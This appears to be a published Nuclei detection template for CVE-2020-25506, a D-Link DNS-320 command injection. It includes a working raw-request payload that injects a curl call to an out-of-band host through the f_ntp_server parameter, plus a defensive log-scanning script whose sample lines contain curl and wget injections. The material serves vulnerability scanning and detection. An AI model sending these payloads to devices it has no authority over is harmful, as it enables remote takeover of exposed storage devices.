D-Link DNS-320 - Unauthenticated Remote Code Execution
ID: CVE-2020-25506
Severity: critical
Author: gy741
Tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev
Description

D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in the system_mgr.cgi component. The component does not sanitize the value of the HTTP parameter f_ntp_server, which leads to arbitrary command execution.
YAML Source

```yaml
id: CVE-2020-25506

info:
  name: D-Link DNS-320 - Unauthenticated Remote Code Execution
  author: gy741
  severity: critical
  description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected device.
  remediation: |
    Apply the latest firmware update provided by D-Link to mitigate this vulnerability.
  reference:
    - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675
    - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-25506
    - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10183
    - https://www.dlink.com/en/security-bulletin/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-25506
    cwe-id: CWE-78
    epss-score: 0.97383
    epss-percentile: 0.99903
    cpe: cpe:2.3:o:dlink:dns-320_firmware:2.06b01:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: dlink
    product: dns-320_firmware
    shodan-query: http.html:"sharecenter"
    fofa-query: body="sharecenter"
  tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev

variables:
  useragent: '{{rand_base(6)}}'

http:
  - raw:
      - |
        POST /cgi-bin/system_mgr.cgi? HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

        C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'`
      - |
        POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: {{useragent}}"
# digest: 4b0a0048304602210087183c039efa68bd3eb651069de0a7d2cb944ea31d8186f5348dd53ef5d89808022100b51d7c76c6ee9a7041b8fac5abdc560ecd4b5b7c207750bc9189ccabb3336aa8:922c64590222798bb761d5b6d8e72950
```

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

```
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-25506.yaml"
```
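On the defensive side, the same request shape the template sends (a `cmd=cgi_ntp_time` call to `system_mgr.cgi` whose `f_ntp_server` carries shell metacharacters) can be hunted for in HTTP access logs. The following is an added example, not part of the template or of D-Link's code; the log format and every log line are constructed for illustration, and it only covers the query-string variant, since the POST-body variant is invisible to access logs and needs a WAF or full-request capture.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed access-log lines (hypothetical, not from any real device):
# client, quoted request line, status. Line 3 mirrors the template's
# backtick injection; line 4 uses a ';' separator instead.
SAMPLE_LOG = """\
10.0.0.5 "GET /cgi-bin/system_mgr.cgi?cmd=cgi_get_status HTTP/1.1" 200
10.0.0.7 "POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=pool.ntp.org HTTP/1.1" 200
198.51.100.9 "POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=%60curl%20http%3A%2F%2Foast.invalid%60 HTTP/1.1" 200
198.51.100.9 "POST /cgi-bin/system_mgr.cgi?cmd=cgi_ntp_time&f_ntp_server=ntp.example%3Bwget%20x HTTP/1.1" 200
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})$'
)
# Metacharacters that let a value break out of a shell-built command (CWE-78).
SHELL_META_RE = re.compile(r"[`;|&\n]|\$\(")
# A legitimate NTP server value is only ever a hostname or IP literal.
VALID_HOST_RE = re.compile(r"^[A-Za-z0-9.\-:]{1,253}$")


def check_ntp_value(value: str) -> bool:
    """True if an f_ntp_server value looks like a command injection attempt."""
    decoded = unquote_plus(value)  # decode once more to catch double-encoding
    return bool(SHELL_META_RE.search(decoded)) or not VALID_HOST_RE.match(decoded)


def detect(log_text: str) -> list[dict]:
    """Flag system_mgr.cgi cgi_ntp_time requests whose f_ntp_server is suspicious."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path != "/cgi-bin/system_mgr.cgi":
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # already URL-decoded
        if params.get("cmd") != ["cgi_ntp_time"]:
            continue
        for value in params.get("f_ntp_server", []):
            if check_ntp_value(value):
                hits.append({"client": m["client"], "value": unquote_plus(value)})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(f"{hit['client']}: suspicious f_ntp_server={hit['value']!r}")
```

The allowlist check is the same rule the CGI handler should have applied before passing the value to a shell: reject anything that is not a plain hostname or IP literal.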